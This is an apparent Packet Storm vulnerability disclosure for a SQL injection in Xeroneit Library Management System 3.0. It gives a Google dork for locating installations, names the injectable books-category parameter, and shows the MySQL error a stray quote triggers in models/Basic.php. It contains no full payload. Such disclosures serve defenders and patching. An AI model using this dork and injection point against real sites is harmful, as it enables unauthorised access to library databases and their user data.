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packetstormSohel YousefPACKETSTORM:157190
HistoryApr 10, 2020 - 12:00 a.m.

Xeroneit Library Management System 3.0 SQL Injection

Sohel Yousef
# Exploit Title: Xeroneit Library Management System SQLI  
# Google Dork: "LMS v3.0 - Xerone IT "  
# Date: 09/04/2020  
# Exploit Author: Sohel Yousef jellyfish security team  
# Software Link:  
# Software Demo :  
# Version: v3.0  
# Category: webapps  
1. Description  
scritp has SQLI in books category at this dir  
Error Number: 1064  
You have an error in your SQL syntax; check the manual that corresponds to  
your MySQL server version for the right syntax to use near '0' GROUP BY  
`title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21' at line 3  
SELECT sum(cast(cast(book_info.status as char) as SIGNED)) as  
available_book, `book_info`.`number_of_books`, `book_info`.`id`,  
`book_info`.`category_id`, `book_info`.`title`, `book_info`.`size1` as  
`size`, `book_info`.`publishing_year`, `book_info`.`publisher`,  
`book_info`.`edition_year`, `book_info`.`subtitle`, `book_info`.`edition`,  
`book_info`.`isbn`, `book_info`.`author`, `book_info`.`cover`,  
`book_info`.`add_date` FROM `book_info` WHERE FIND_IN_SET('57'',  
category_id) !=0 AND `book_info`.`deleted` = '0' GROUP BY `title`,  
`author`, `edition` ORDER BY `title` ASC LIMIT 21  
Filename: models/Basic.php  
Line Number: 284  